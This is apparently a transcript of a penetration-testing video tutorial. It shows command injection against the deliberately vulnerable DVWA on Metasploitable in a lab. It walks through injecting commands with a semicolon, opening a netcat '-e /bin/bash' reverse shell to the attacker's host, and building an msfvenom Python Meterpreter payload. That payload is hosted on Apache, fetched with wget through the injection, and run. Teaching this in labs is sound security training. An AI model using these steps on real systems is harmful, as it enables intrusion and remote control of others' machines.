Hello, welcome back to this video, and in this part we are going to discuss the web application penetration testing, and we are going to see all the vulnerabilities that are found within the web application. And the first part that we are going to check is the what we call the command injection or the command execution. So what is this type of vulnerability? This is when we can inject malicious codes or injections to a web application. And without further ado, let's get into the practical example. And for this part we are going to use the DVWA vulnerability, and you can start up your metasploitable and type ifconfig and run get your IP address. And we need to do that, just write the IP address and then the DVWA. And when you encounter this web page, we are going to see how we can inject commands which are malicious. And before we do that, make sure that the DVWA security is to low, as I did with mine. And the first vulnerability of web application that we're going to see right now is the command execution. The first thing that we have to do when we try to do a penetration testing is you have to familiarize with the website, how it works, and how response it gives, what kind of programming does it use for its coding, and so on and so on. So in this part, what it says is enter an IP address. So let's try to do an IP address, whatever it is. Let's try 45 or 23, and let's try to submit it. Maybe let's try mine, 192.168. As you can see here, 3 packets transmitted, 0 receivers, and 100 packet loss, because I entered an available IP address. What else we can do this with this input field? What we can do is let's try to inject another type of command. Let's say ls. Can it work? It doesn't give any errors or any output. So what if we can do first IP address, and after that let's try to ls. Okay, so as you can see here, it did the pinging to this IP address right here, and it also managed to do the ls. This means that it's the web application is executing or giving a response to our input. So there is definitely a vulnerability in here, and it means that we can also inject other commands. Let's try to do ls minus la. Okay, as you can see, it even do the second one, which is it listed all the directories right here which are found with the DVWA web application. So knowing that there is definitely vulnerability, what else we can do? And for this part, we are going to open a shell and gain access to our web application. And what do you think, and how do you think that we will come to that? Do you have any ideas? Okay, pause for a minute and try to think how we can gain access by injecting command to the input field of this website. One way that we can do is first, let's try to enter an IP address, or you can just delete this one and put semicolon. It means that there is definitely, and the way that this web application will think is there is definitely an IP address before the semicolon right here. That's why I just put the semicolon and then the command that I want to do. And the way that we can gain access from here is by using the netcat command, and we all know that the netcat command can give us shell to any target system. And before we inject the command, first let us set up a listener, which is, let's put it is this one, which is 555. We're gonna set up a listener, and the command will be netcat nc -e. Let's put it this way. First, let me delete because I've already used this one. The only way that we can change is first, let's change the port number, and this one the IP address of our Kali Linux, which is, let's go ahead and check it. Let me open a new terminal, and if I type if config this is our IP address. And so let me get back to my web browser and change this one to 248. So the command will be netcat -e, which is for the one that it will create a bash terminal, and the IP address of our Kali Linux machine, which is the listener, and the port number. So if I type submit, so let us check if we got, as you can see here, we got connected here, and we definitely got a shell. So if I type ls or pwd, sorry, we did connect it, but it didn't give us a shell back. So let me stop this, try to set up a new listener and change the port number, and get back to my web browser and just type netcat-e/bin/bash, which is 192.168.88.248, which is the IP address of our Kali Linux, and then the port number, which is 12345. And I'm gonna click submit, and let us get back to our terminal. It didn't create one. (192.168). Sorry, it has to be this one, which is netcat-e/bin/bash 192.168.88.248, and change 12345 and press enter. And let me get back to my terminal, and as you can see here, we got our connect. We have corrected to this from this. This is the IP address of our Kali Linux machine, and this is the IP address of our Metasploitable. And if I type ls again, we did get back a shell, and it listing out all the files and directories. If I type pwd, we are of course in the dvwa. Okay, and in this video we are going to see how we can gain access with a Meterpreter shell and run different commands on target system, because our Meterpreter give us a lot of different options to run on the target system. Before we proceed this, there are different steps that we must follow. The thing is, we have to create a payload, and we have to find a way in which we have to download the payload to the target system. After that, we can set up our listener and gain access to the target system. But before we proceed to the practical steps, first we must know what our target system is, or what its entities are. And we know that our Metasploitable is a Linux 32-bit machine. We know for sure that we can run Python in Linux machine without the user to install the Python software by itself. So for this part, we are going to create a Python payload. After that, when we create the payload, we are going to host the payload in our web server, which is the Apache. And after that, we have to download the payload to our target system. And after that, we are going to execute the payload in our target system and gain access using the Meterpreter shell or the MSF console. So without further ado, let's get into it. First things first, we have to create the payload, which is MSF venom-p. Remember, we are going to create a Python Meterpreter shell, and let's call it, this is the command, which is MSF venom Python Meterpreter reverse TCP lhost, which is going to be the IP address of our Kali Linux machine. And as you can see, this is our IP address. So let's change this one to 248, and L port is going to be 55, and then we are going to output it in a file called ti.py, since it's going to be a Python payload. And I'm going to press enter right here. As you can see, it's done. And as you can see here, where is it? This is our payload. So the next step will be how we can get the payload and host it on our server. and we know for this part we are going to use Apache. Before we do that, let's first start our Apache server. I forgot to put the A here. Press enter. Type in my password. So to host our payload, we have to navigate to this directory, which is the var www/html. This is the folder or the directory in which we are going to host our payload. Let's type ls. First, let's remove this one, which is tester. And we are going to copy our payload, which is found in our home /shoel/np ci to our var /www.html. okay, you have to be root, so I'm gonna type sudo and type in my password and host, and as you can see here, it is created. Okay, so let's go ahead to our web browser and check whether our payload is present or not. So if I type the IP address of our Kali Linux mission and press enter, as you can see here, our payload is here. Now that we hosted our payload, we have to make sure or we have to find any way in which we are going to download our payload into the target system. So let's go ahead to your DVWA website, and don't forget to change the security to low. And after the command execution, we have to find a way in which we are going to create or download our payload. And in the previous video, we found a vulnerability that we can inject any command in this input folder right here. So what we did was, first we can type ls here and find all the directories or files found with this one. So how can we find a way to download it from our web server that we stood to this target system? We are going to use a command called wget. This is a Linux command in which it will help you to download any file or any file you want. So if I type wget 192.168.88.248 / our payload's name, which is mpci.py. Let's make sure the spelling is correct. Yeah, mpci.py. As you can see here, what I'm doing is wget, which is the command or to download the payload, and this is our Kali Linux address and the payload's name, and I'm gonna click submit. And if I type ls again, sorry, first I have to put the semicolon, type ls to make sure our payload is there or not. As you can see, our payload is there. So we have found a way to download the payload to our target system. Now what's left is to run the payload and set up our listener and gain a interpreter share. And to do that, we have to use the MSF console. So let me close this and type MSF console and let it run up for a minute. Okay, now that our MSF console is up and running, first we have to set up a listener, the multi handler, which is exploit/multi/handler. Okay, and if we type options, set lhost to our Kali Linux, which is 192.168.88.248, and set to lport 2, which is 555, and set to payload to Python meter interpreter / reverse underscore TCP. I forgot to add E here. Python interpreter reverse TCP. And type options here. lhost is set up, lport is set up, and let's run it. And after that we have to run our payload, which is python.mpci.py, and run this. And let's run it again. And let's add this back to our terminal. Okay, I don't know why it didn't create. Let us try to run it again, because it was the same way that we created our payload, which is the port is right here. Yeah, it's there. So if I type Python, so let's try to run it. Python I don't know why it's not running. Python mpci.py. Let us even try this one even. Okay, so we created our interpreter share. We opened our interpreter using the vulnerability of command injection, and this was our part for this video. And don't forget to subscribe and like, and see you in the next video.